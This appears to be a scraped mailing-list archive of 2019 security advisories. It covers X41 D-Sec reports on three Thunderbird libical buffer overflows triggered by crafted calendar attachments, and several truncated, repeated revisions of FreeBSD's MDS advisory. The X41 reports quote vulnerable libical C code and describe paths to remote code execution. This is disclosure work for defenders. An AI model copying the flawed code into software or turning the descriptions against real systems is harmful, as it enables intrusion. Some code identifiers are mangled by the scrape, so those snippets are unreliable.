M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu
gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr
QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm
UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk=
=Hy9J
-END PGP SIGNATURE-

X41 D-Sec GmbH Security Advisory X41-2019-003: Stack-based buffer overflow in Thunderbird

2019-06-14 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-003

Stack-based buffer overflow in Thunderbird
==
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11705
CWE: 121
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird

Summary and Impact
==
A stack-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash or gain remote code
execution in the client system.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis

A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules()
can be triggered while parsing a calendar attachment containing a
malformed or specially crafted string.

~~~
static int icalrecuraddbydayrules(struct icalrecurparser *parser,
const char *vals)
{
short *array = parser->rt.byday;
// ...
while (n != 0) {
// ...
if (wd != ICALNOWEEKDAY) {
array[i++] = (short) (sign * (wd + 8 * weekno));
array[i] = ICALRECURRENCEARRAYMAX;
}
}
~~~

Missing sanity checks in `icalrecuradd_bydayrules()can lead to
out of bounds write in aarraywhenweekno` takes an invalid value.
The issue manifests as an out-of-bounds write in a stack allocated
buffer overflow.
It is expected that an attacker can exploit this vulnerability to
achieve remote code execution when proper stack smashing mitigations
are missing.

Proof of Concept

A reproducer eml file can be found in

https://github.com/x41sec/advisories/tree/master/X41-2019-003

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline

2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.

Custom research and a IT security consulting and support services are
core competencies of X41.
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtJsACgkQo5Klpg50
CxALNg//RiEGsoszNtnBzS/tvL5UIniG6oBXHaqu+9XZUJeM+tYzs4Z3JvvHWx1y
exGt3nM3PMXgw21lr8NumJGHibMDckIrOIpetphg9GqRfk/iS4NivcHcbhSq7sNz
NajGpulM6HtgDflFgpB1GKfekE/DJlbiULq5SBgv/bARRARGGgGNtWp863sQPKG+
rvjSOnTyQw1ypYjozMYrmUasgC4jsLmB0LUIWqHy6lEN5OWehnO9pOpiV8xTA0qc
Y9C0IDkf6YGH6xwOxaUXc9HXGBOiQATexNGOtOmWoUsg7cpRdnuoo8YOP9V+kbeX
OK301LlXUtt0th5zu6tVGo4WK75sI8gmpxUtcbIyCxTzRC7fqAlbHGaKlQURZ23s
/2Tv5pzpBBjIO4T2t8v1O/10pDyfH2zUCXik3il2GY+zpNprR1Va6asB4y3nEPl1
ghLYCjHt58CZJZILMmK/lZap6I3ea9UaW3TsZuC07zv8A9bf+I6xcgA0+4Ms6e0P
1d1T/ygVluKRay5fgiiubTYAqtngFTOXMCioj/JmeDvL+wTYpwduukhZxDuGT6P/
OV0MuvDW1RQpj2hsw+dbcVnE+Y7X/WZDVbq3ByOj5VQz/mTPkcGaJVh37kI9Sp6A
YFJYuJrFqmdMFh365aUmAOp26hYdY9++wwWAqAlYAVFjLXst5is=
=E1se
-END PGP SIGNATURE-

X41 D-Sec GmbH Security Advisory X41-2019-002: Heap-based buffer overflow in Thunderbird

2019-06-14 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-002

Heap-based buffer overflow in Thunderbird
=
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11703
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==
A heap-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash or gain remote code
execution in the client system.

This issue was initially reported by Brandon Perry here:

https://bugzilla.mozilla.org/show_bug.cgi?id=1281041

and fixed in libical upstream, but was never fixed in Thunderbird.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis

A heap-based buffer overflow in icalparser.c parser_get_next_char()
can be triggered while parsing a calendar attachment containing a
malformed or specially crafted string.
The issue initially manifests with out of bounds read, but we don't
discard it could later lead to out of bounds write.
It is expected that an attacker can exploit this vulnerability to
achieve remote code execution.

Proof of Concept

A reproducer ical file can be found in

https://github.com/x41sec/advisories/tree/master/X41-2019-002

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline

2016-06-20 Issue reported by Brandon Perry to the vendor
2019-05-23 Issues reported to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.

Custom research and a IT security consulting and support services are
core competencies of X41.
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtHsACgkQo5Klpg50
CxD5DRAAnruhd0PEjQV3ELUiM/9PHe5hC8rpWLqPNcuDY/dbPvg4w1qOAoXops9e
d3hJlMM2zaUeAv5MZGgxT7FIO116IFafALMjMssIC9zw3yM9oKF4s1amL/GzF+P9
vMamD3A5t5j2mHYuWFaDe+bcHak8QfmVgSRqKNvNp/rF27oWE3SgCraYFP1+RlpR
s0qbFcjLdo9SBqvpbSt3cbolrIOiS2nXER1cthmd2Ig7ga3oElEfWKZ19d+twBxx
oKqtS607p9ASfql29HDwC0VtgQPx1ySRBestYDtjsD2d97bAaAhA2/Kkpx6A/H91
EbiSyKByO3vs+nQzTdkI/xNN9edBly6se3WKaDBIfZOzWCsXwcUtUKpnAw5YMf/n
BoaDzv/D70Sk3GfXOD9qb2bMNFCEQdeZh3O1Tmmzi3kXa9kQJfdIDdjfeeDd7h87
r6vtYeHA7mVM2BGteO5FHQhooJVSi+gcGg9esj5656YznRS9zbc7KgkWJiItwMhj
hiBL7r8v2M0Gzx4qhhCg+gxl+ikBaYCgZh9WGi4fsekwufwEnnCnQxN52ZE9vBia
BJJGpPbGkVaxDCJXOfQDvJiovbG4ekK54tavqLBXaH/KuucMFGaE95gPSKnxn8LD
0QwpeLzad2bSiolSHux5RBR/t5d4znzjce/qxIpRQdWcgu9kzTs=
=1OOu
-END PGP SIGNATURE-

X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird

2019-06-13 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-001

Heap-based buffer overflow in Thunderbird
=
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11704
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==
A heap-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash or gain remote code
execution in the client system.

This issue was initially reported by Brandon Perry here:

https://bugzilla.mozilla.org/show_bug.cgi?id=1280832

and fixed in libical upstream, but was never fixed in Thunderbird.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis

A heap-based buffer overflow in icalvalue.c
icalmemory_strdup_and_dequote() can be triggered while parsing a
calendar attachment containing a malformed or specially crafted
string.

~~~
static char *icalmemorystrdupanddequote(const char *str)
{
char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
char *pout = out;
// ...
for (p = str; *p!=0; p++){
if( *p == '\')
{
p++;
// ...
else
{
*pout = *p;
}
}
~~~

Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the
inputp` ends with a backslash, which enables an attacker to read out
of bounds of the input buffer and writing out of bounds of a
heap-allocated
output buffer.
The issue manifests in several ways, including out of bounds read and
write, null-pointer dereference and frequently leads to heap corruption.

It is expected that an attacker can exploit this vulnerability to
achieve remote code execution.

Proof of Concept

A reproducer EML file can be found in:

https://github.com/x41sec/advisories/tree/master/X41-2019-001

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline

2016-06-19 Issue reported by Brandon Perry to the vendor
2019-05-23 Issue reported by X41 D-SEC to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and a IT security consulting and support services are
core competencies of X41.
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtFQACgkQo5Klpg50
CxDziQ/+JVKmkCHu3UXeNTrf3nFAcg3pzopaADVMK4yo7P/iQW/HMtvlz3sbi/ND
8nkTzXjPwTXmPZqrcr8X28lsffx2wu4ehIZNp2izTkfQkbIeA0co1bM2KhGJU+p+
GQP8yGsVi00+UvQfd5KxB4ydc7/Q4nTFH325yx7D4OHW/rDuETt5p8h1h7zmFBW+
SV09t4qQQx8HeWj2pQS6wF6pWo80/nqJbS8f540PQ+XTysvYsflxiybAqYK2mW2j
QzvjT/YosR39JCMHBKscptwVgJFT6b2DsSq+Lt+1BTn0Ef0XoIY/rMvLFX1ww8HK
nsViFPjtyhkX7CftIjZK6y4oK4nKsgyDiOieNKodfkr1jTmipUIIjwtGM99pKcv2
wNDY4ySB7RSbW+W+yrWc75vEX+Ev1enXkeM6xcJiPO0CiWfceZpVzZVcjoFqt9H6
57Uy10OMzZDi3reIMsMs3SxpRyXQqcyjlPkk7PlkzHx2XjAMKqwW6t5QZwMpIHrm
M4BQOzxz9UuhnfZI80ZmJhYCh9zOOdjmJXGxOp5cB1GSXjQQ7PH/0aqTbfI0Hp+b
uxqXsxBJ0YTO0qhHluuPkInqLEKlewHvNT4P5YE7US3TNCHPuei7P3zTq7fqSPjW
sgj9XXjf4cbB7N+txXnq55BpHemGKAd4spgvQvo0L35m2RribBs=
=sYWR
-END PGP SIGNATURE-

X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird

2019-06-13 Thread X41 D-Sec GmbH Advisories

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

X41 D-Sec GmbH Security Advisory: X41-2019-001

Heap-based buffer overflow in Thunderbird
=
Severity Rating: High
Confirmed Affected Versions: All versions affected
Confirmed Patched Versions: Thunderbird ESR 60.7.XXX
Vendor: Thunderbird
Vendor URL: https://www.thunderbird.net/
Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814
Vector: Incoming mail with calendar attachment
Credit: X41 D-SEC GmbH, Luis Merino
Status: Public
CVE: CVE-2019-11704
CWE: 122
CVSS Score: 7.8
CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O
Advisory-URL:
https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird

Summary and Impact
==
A heap-based buffer overflow has been identified in the Thunderbird
email client. The issue is present in the libical implementation, which
was forked from upstream libical version 0.47.
The issue can be triggered remotely, when an attacker sends an specially
crafted calendar attachment and does not require user interaction. It
might be used by a remote attacker to crash or gain remote code
execution in the client system.

This issue was initially reported by Brandon Perry here:

https://bugzilla.mozilla.org/show_bug.cgi?id=1280832

and fixed in libical upstream, but was never fixed in Thunderbird.
X41 did not perform a full test or audit on the software.

Product Description
===
Thunderbird is a free and open source email, newsfeed, chat, and
calendaring client, that's easy to set up and customize.

Analysis

A heap-based buffer overflow in icalvalue.c
icalmemory_strdup_and_dequote() can be triggered while parsing a
calendar attachment containing a malformed or specially crafted
string.

~~~
static char *icalmemorystrdupanddequote(const char *str)
{
char *out = (char *)malloc(sizeof(char) * strlen(str) + 1);
char *pout = out;
// ...
for (p = str; *p!=0; p++){
if( *p == '\')
{
p++;
// ...
else
{
*pout = *p;
}
}
~~~

Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the
inputp` ends with a backslash, which enables an attacker to read out
of bounds of the input buffer and writing out of bounds of a
heap-allocated
output buffer.
The issue manifests in several ways, including out of bounds read and
write, null-pointer dereference and frequently leads to heap corruption.

It is expected that an attacker can exploit this vulnerability to
achieve remote code execution.

Proof of Concept

A reproducer EML file can be found in:

https://github.com/x41sec/advisories/tree/master/X41-2019-001

Workarounds
===
A fix is available from upstream. Alternatively, libical can be replaced
by icaljs, a JavaScript implementation of ical parsing, by setting
calendar.icaljs = true in Thunderbird configuration.

Timeline

2016-06-19 Issue reported by Brandon Perry to the vendor
2019-05-23 Issue reported by X41 D-SEC to the vendor
2019-05-23 Vendor reply
2019-06-12 CVE IDs assigned
2019-06-13 Patched Version released
2019-06-13 Advisory released

About X41 D-SEC GmbH

X41 is an expert provider for application security services.
Having extensive industry experience and expertise in the area of
information security, a strong core security team of world class
security experts enables X41 to perform premium security services.
Fields of expertise in the area of application security are security
centered code reviews, binary reverse engineering and vulnerability
discovery.
Custom research and a IT security consulting and support services are
core competencies of X41.
-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CsOUACgkQo5Klpg50
CxA8/A/+KajTIDyZwSInPe0uftrEG/c+DNJLQfpH53sBH4qI9G8F+FPquEibdCEm
WIXlbdxxo7iVGkBUxws3+aqOXYtBYRGUQvSMDxcM9bmLWkzIOWCZ7RW4h4KOngWu
NiWqFkdpRLxSjHgEFn3eegvcnwEmpOlV4eBw5oY1rTFCg44hbrLXTKEZqOOVFII/
n754abauYhol2SezeuJL2Du1hf7n0e4T6DPdYsrwB4+3XwAdp6n86hy9DdXniqdk
XvJ2WFTKPljkt2suHmkM28zx8q52O5kMIK0Szc5MVZRiFIrPNh/oYFkCoBVYTqFQ
/ui0YJZOy8O6mA1l7j7A3I+t3DSUu4Cs0fCVCqrBVKm1LNcmnWIyDrGRCpY5WOTI
S8lllwEeUv5UoSaoPAWIXhvo1J4ISUX0qoNWNqtRENJCXjZvsmOvZkwWy0bMdu5g
1iWZ3Ro/hx7eAbakWKPrzRdnLI7wz7bBcnm3BSY4gelAhtTMLds/OSplDUpYL1cI
KRMsnosf2CBiRGlGqdpXVlXcsmi3dozRY7q87Kxh58x50efGTqYQ+yAmR1pMrQgH
O0yWaspEQOnqoPiw9dvT3gTqopk0qNdPWwbr599NAVOP5d0H3AKyeJxzTzVUIsxg
Jynb/E4hQxgyYN8tSqH/2SXqmXiOPJrJgLt0O4KmKVjMwvnS/OU=
=3l5l
-END PGP SIGNATURE-

FreeBSD Security Advisory FreeBSD-SA-19:07.mds [REVISED]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:07.mdsSecurity Advisory
  The FreeBSD Project

Topic:  Microarchitectural Data Sampling (MDS)

Category:   core
Module: kernel
Announced:  2019-05-14
Credits:Refer to Intel's security advisory at the URL below for
detailed acknowledgements.
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

0.   Revision history

v1.0   2019-05-14  Initial release.
v1.1   2019-05-15  Fixed date on microcode update package.
v1.2   2019-05-15  Userland startup microcode update details added.
   Add language specifying which manufacturers is affected.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may
be able to infer stale information from microarchitectural buffers to obtain
a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Only Intel x86 based processors are affected.  x86 processors from other
manufacturers (eg, AMD) are not believed to be vulnerable.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0 >> /boot/loader.conf'
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction date,
evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the Intel microcode update can be applied at
boot time (only on FreeBSD 12 and later) by adding the following lines to the
system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all
FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html>.

Mitigation

FreeBSD Security Advisory FreeBSD-SA-19:07.mds

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:07.mdsSecurity Advisory
  The FreeBSD Project

Topic:  Microarchitectural Data Sampling (MDS)

Category:   core
Module: kernel
Announced:  2019-05-14
Credits:Refer to Intel's security advisory at the URL below for
detailed acknowledgements.
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
2019-05-15 13:44:27 UTC (releng/12.0, 12.0-RELEASE-p5)
2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

0.   Revision history

v1.0   2019-05-14  Initial release.
v1.1   2019-05-15  Fixed date on microcode update package.
v1.2   2019-05-15  Userland startup microcode update details added.
   Add language specifying which manufacturers is affected.
v1.3   2019-05-15  Minor quoting nit for the HT disable loader config.
v2.0   2019-05-15  Rerelease 12.0-RELEASE patch as -p5 due to i386 panic bug.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may
be able to infer stale information from microarchitectural buffers to obtain
a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Only Intel x86 based processors are affected.  x86 processors from other
manufacturers (eg, AMD) are not believed to be vulnerable.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf
# shutdown -r +10min "Security update"

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction date,
evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14.

If using the package or port the Intel microcode update can be applied at
boot time (only on FreeBSD 12 and later) by adding the following lines to the
system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

To automatically load microcode during userland startup (supported on all
FreeBSD versions), add the following to /etc/rc.conf:

microcode_update_enable="YES"

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[*** v2.0 NOTE *** Only applies to 12.0-RELEASE ***]
Due to an error in the 12.0-RELEASE affecting the i386 architecture, a new
set of patches is being released.  If your 12.0-RELEASE sources are not yet
patched using the initially published patch, then you need to apply the
mds.12.0.patch. If your sources are already updated, or patched with the
patch from the initial advisory, then you need to apply the incremental
patch, named mds.12.0.p4p5.patch

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE, not patched with initial SA-19:07.mds patch]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.

FreeBSD Security Advisory FreeBSD-SA-19:07.mds

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:07.mdsSecurity Advisory
  The FreeBSD Project

Topic:  Microarchitectural Data Sampling (MDS)

Category:   core
Module: kernel
Announced:  2019-05-14
Credits:Refer to Intel's security advisory at the URL below for
detailed acknowledgements.
Affects:All supported versions of FreeBSD.
Corrected:  2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE)
2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4)
2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE)
2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10)
CVE Name:   CVE-2018-12126, CVE-2018-12127, CVE-2018-12130,
CVE-2019-11091

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit https://security.FreeBSD.org/>.

I.   Background

Modern processors make use of speculative execution, an optimization
technique which performs some action in advance of knowing whether the
result will actually be used.

II.  Problem Description

On some Intel processors utilizing speculative execution a local process may
be able to infer stale information from microarchitectural buffers to obtain
a memory disclosure.

III. Impact

An attacker may be able to read secret data from the kernel or from a
process when executing untrusted code (for example, in a web browser).

IV.  Workaround

No workaround is available.

Systems with users or processors in different trust domains should disable
Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0:

# echo 'machdep.hyperthreading_allowed=0 >> /boot/loader.conf'
# shutdown

V.   Solution

Perform one of the following:

Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD
stable or release / security branch (releng) dated after the correction date,
evaluate mitigation and Hyper Threading controls, and reboot the system.

New CPU microcode may be available in a BIOS update from your system vendor,
or by installing the devcpu-data package or sysutils/devcpu-data port.
Ensure that the BIOS update or devcpu-data package is dated after 2014-05-14.

If using the package or port the microcode update can be applied at boot time
by adding the following lines to the system's /boot/loader.conf:

cpu_microcode_load="YES"
cpu_microcode_name="/boot/firmware/intel-ucode.bin"

Microcode updates can also be applied while the system is running.  See
cpucontrol(8) for details.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install

Follow additional details under "Mitigation Configuration" below.

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0-STABLE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc
# gpg --verify mds.12-stable.patch.asc

[FreeBSD 12.0-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc
# gpg --verify mds.12.0.patch.asc

[FreeBSD 11.3-PRERELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc
# gpg --verify mds.11-stable.patch.asc

[FreeBSD 11.2-RELEASE]
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc
# gpg --verify mds.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html>.

Mitigation Configuration

Systems with users, processes, or virtual machines in different trust
domains should disable Hyper-Threading by setting the
machdep.hyperthreading_allowed tunable to 0:

# echo machdep.hyperthreading_allowed=0 >> /boot/loader.conf

To activate the MDS mitigation set the hw.mds_disable sysctl.  The settings
are:

0 - mitigation disabled
1 - VERW instruction (microcode) mitigation enabled
2 - Software sequence mitigation enabled (not recommended)
3 - Automatic VERW or Software selection

Automatic mode uses the V

FreeBSD Security Advisory FreeBSD-SA-19:05.pf

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

=
FreeBSD-SA-19:05.pf Security Advisory
  The FreeBSD Project

Topic:  IPv6 fragment reassembly panic in pf(4)

Category:   contrib
Module: pf
Announced:  2019-05-14
